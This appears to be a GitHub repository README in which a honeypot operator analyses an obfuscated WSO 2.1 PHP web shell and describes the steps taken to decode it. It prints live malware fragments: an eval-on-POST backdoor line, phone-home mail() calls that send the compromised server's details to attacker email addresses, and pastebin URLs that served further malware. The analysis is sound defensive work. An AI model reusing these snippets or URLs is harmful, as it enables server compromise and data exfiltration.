Skip to content

Latest commit

 

History

History

wew.php

Folders and files

NameName
Last commit message
Last commit date

parent directory

..

2ww.f1.php

2ww.f1.php

 
 

2ww.f2.php

2ww.f2.php

 
 

2ww.php

2ww.php

 
 

58.44.44.33WqEH5ybsZB6qzsq9tL9VmwAAAAE.wso.scans

58.44.44.33WqEH5ybsZB6qzsq9tL9VmwAAAAE.wso.scans

 
 

README.md

README.md

 
 

dc1.php

dc1.php

 
 

sd1.php

sd1.php

 
 

sd2.php

sd2.php

 
 

shell_data

shell_data

 
 

wew

wew

 
 

wew.php

wew.php

 
 

wmw.php

wmw.php

 
 

wso2.6.php

wso2.6.php

 
 

x3.php

x3.php

 
 

z0

z0

 
 

z0.1

z0.1

 
 

z0.2

z0.2

 
 

z1

z1

 
 

z1.1

z1.1

 
 

z2

z2

 
 

README.md

Web Shell by oRb, Version 2.1, plus a lot of kinks

2018-03-08

Obfuscated WSO version 2.1, an old favorite, this time with a little bit more complicated encoding than is common. The web shell itself is completely kinked, containing two phone-homes, and doing two downloads from pastebin.com, one of which is an email tool, the other is WSO 2.6 web shell.

This is complicated. it contains layers of malware.

Origin

IP Address 58.44.44.33

58.44.44.33 has no DNS name.

58.44.44.33 belongs to Hunan Telecom, in Yueyan, Hunan

inetnum:        58.44.0.0 - 58.44.127.255
netname:        CHINANET-HN-YY
country:        CN
descr:          CHINANET-HN Yueyang node network
descr:          hunan Telecom
admin-c:        CHY4-AP
tech-c:         CH636-AP
status:         ALLOCATED NON-PORTABLE
mnt-by:         MAINT-CHINANET-HN
mnt-lower:      MAINT-CHINANET-HN-YY
last-modified:  2008-09-04T07:03:41Z
role:           CHINANET HuNan Yueyang
address:        Dongmaoling telecom building,Yueyang,Hunanan 414000
country:        CN
phone:          +86 730 8235976
fax-no:         +86 730 8235976
e-mail:         abuse.yy@2118.com.cn

The HTTP requests ended up setting PHP HTTP_ACCEPT_LANGUAGE of zh-cn, which makes sense with respect to the IP address' physical location.

p0f3 says 58.44.44.33 runs "Windows 7 or 8":

[2018/03/08 02:07:50] mod=syn|cli=58.44.44.33/9326|srv=162.246.45.144/80|subj=cli|os=Windows 7 or 8|dist=13|params=none|raw_sig=4:115+13:0:1200:8192,2:mss,nop,ws,nop,nop,sok:df,id+:0

The User Agent string of "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" seems to confirm that.

Download

Downloaded to same 404.php backdoor as this recon malware, except it used more POST parameters. This is a facet of the backdoor just doing a PHP eval() on the value of a specific POST parameter, "@123". The attacker sent a string in "@123" that used POST parameters named "z0", "z1" and "z2".

Decoding

There's multiple threads of decoding, because of the multiply-compromised code. We start with only one file, but end up with many.

  1. Hand edit 58.44.44.33WqEH5ybsZB6qzsq9tL9VmwAAAAE.wso.scans into files z0, z1, z2
  2. Get z0 decoded.
    1. Hand edit z0 to leave only Base64-encoded text
    2. Invoke base64 -d z0 > z0.1
    3. Add "<?php" to z0.1, pretty-print to get z0.2.
  3. Get z1 decoded.
    1. Hand edit z to leave only Base64-encoded text
    2. Invoke base64 -d z1 > z1.1
    3. File z1.1 has a string in it: "SCRIPT_FILENAMEZ::/wew.php".
  4. Get z2 decoded.
    1. Hand-edit z0.2, using z1.1 and z2 contents, into dc1.php
    2. Invoke php dc1.php, which decodes the string from z2 into file wew.php
  5. Pretty-print wew.php into wew for readability.
  6. Decode obfuscated phone home (second phone home)
    1. Extract lines 91, 92 from wew into shell_data
    2. Hand-edit shell_data so that it prints instead of evals.
    3. Invoke php shell_data > sd1.php
    4. Hand-edit sd1.php to add "<?php"
    5. Pretty-print sd1.php yielding sd2.php

Further Decoding Notes

Relies on ancient 404.php to evaluate code in POST parameter named "@123":

@eval(base64_decode($_POST[z0]));

POST parameter "z0" ends up being a "dropper" that uses value of POST parameter "z1" as a file name, and value of POST parameter "z2" as the contents of that file name.

POST parameter z1 decoded to: SCRIPT_FILENAMEZ::/wew.php which seems wrong for both Linux and Windows machines. a directory SCRIPT_FILENAMEZ:: would have to exist first, before file_put_contents() would function correctly. I don't think Windows file names can have ':' or '/' characters in them. I suspect this would cause the file_put_contents() call to fail miserably.

PHP code in POST parameter "z0" uses a second form of encoding for the contents of POST parameter "z1", 2-character representations of hexadecimal values of the ASCII bytes. The decoding inserts '%' characters every two characters of the encoded contents, then runs PHP's urldecode() builtin on each "%xx" style hex represenation.

File wew.php is the final form of the code, I believe.

Had the attacker actually executed the dropper code (dc1.php), it would end up sending back a string like "->|1|<-" to the downloader. If everything worked correctly. And it probably wouldn't.

Analysis

I'm sorry this is complicated.

wew.php really is WSO 2.1, plus a phone home to wildt00lz@gmail.com, plus download of two files from pastebin.com, wmw.php and 2ww.php, plus a second phone home to d0z_a@yahoo.com. Holy cow, wew.php is totally kinked.

The phone-homes get executed every time wew.php runs, as does a few lines of code that modify php.ini to have Safe Mode off, and to eliminate any disabled functions.

Additionally, wew.php sets a cookie that never gets referenced elsewhere:

@setcookie("wsog","orb",time()+3600*24*7);

Perhaps there's some other malware, when installed on the same web site as wew.php that uses this cookie.

Overall, wew.php exhibits WSO's characteristic organization into "action" functions, with dispatch to an action done with PHP's call_user_func() based on the value of a POST parameter named "a".

First phone home

This phone home was just blatantly shoved in to the WSO 2.1 code. No de-obfuscating necessary.

$body = "Shell: http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . " " . "Directory" . dirname(__FILE__);
mail('wildt00lz@gmail.com', $_SERVER['SERVER_ADDR'], $body);
$body = "Shell: http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . " " . "Directory" . dirname(__FILE__);
mail('wildt00lz@hotmail.com', $_SERVER['SERVER_ADDR'], $body);

The email sent to wildt00lz@hotmail.com and wildt00lz@gmail.com would have an IP address of the compromised web server as its "Subject:" line, and the body would have a URL for the original back door, and the directory in which the kinked WSO 2.1 file wew.php ended up, something like:

Shell: http://www.stratigery.com/wp-content/themes/twentytwelve/404.php /var/www/html/wp-content/themes/twentytwelve

This would probably let the attacker guess at a URL for access to wew.php

wmw.php - from https://pastebin.com/raw/YDMtmcAr

Appears to be a stock LeafMailer, has comments but not the phone-home from an earlier LeafMailer.

2ww.php - from https://pastebin.com/raw/GUcxfLzm

The source code in 2ww.php needs some cleanup to enhance readability.

De-obfuscating 2ww.php

  1. Run de-obfuscator over 2ww.php yielding 2ww.f1.php
  2. Hand edit 2ww.f1.php - remove the eval(' and ');, un-escape the remaining single-quotes.
  3. Run de-obfuscator over 2ww.f1.php to get 2ww.f2.php

I've seen some obfuscation like this before. The file 2ww.php contains obfuscated PHP, followed by a string of encoded text. Using fopen() on itself via the __FILE__ feature of PHP, the obfuscated PHP reads some of the string of encoded text, decodes it, and evals it.

Deobfuscating the mix of code and encoded code in 2ww.f2.php is iterative: figure out how far the file pointer from fopen() is in 2ww.php (initially, the fread() sets it to 0x50D = 1293), determine how much of the encoded data to put into the decoding function (first chunk, 0x1A8 = 424 bytes), and how far that fread() advances the file poiner.

x3.php is the final decoder. It was easier to massage a copy of 2ww.f2.php (x3.php) by doing throwaway intermediate PHP programs from pieces of 2ww.php, then incorporate the knowledge gained into x3.php.

Deobfuscated form of 2ww.php is wso2.6.php.

Ironically, most WSO 2.6 files out in the wild have the same phone-home as the "second phone home" in the WSO 2.1 wew.php file. 2ww.php has had it removed.

Second phone home

The second phone home, from Decoding Step 6 above, ends up looking like this:

<?php
$visitcount = $HTTP_COOKIE_VARS["visits"];
if ($visitcount == "") {
    $visitcount = 0;
    $visitor = $_SERVER["REMOTE_ADDR"];
    $web = $_SERVER["HTTP_HOST"];
    $inj = $_SERVER["REQUEST_URI"];
    $target = rawurldecode($web . $inj);
    $body = "Boss, there was an injected target on {$target} by {$visitor}";
    @mail("d0z_a@yahoo.com", "Fx29Shell http://{$target} by {$visitor}", "{$body}");
} else {
    $visitcount;
}
setcookie("visits", $visitcount);

The first time a browser (the code uses HTTP cookies) accesses the kinked WSO wew.php, the compromised server (the host running my WordPress honey pot) sends an email to "d0z_a@yahoo.com" with the URL of wew.php and the IP address of the browser. What a gold mine of info. Oddly, the email will claim that WSO 2.1 is a Fx29Shell web shell. I think this phone home code originates in Fx29Shell. Either the original author of Fx29 put it in, or someone put it in a widely copied version of Fx29. I've seen this phone home in other versions of WSO. See my malware-phylogeny project for some additional detail.

Nothing turned up when I googled for "wildt00lz@gmail.com", or "d0z_a@yahoo.com". The addresses seem to have stayed off radar.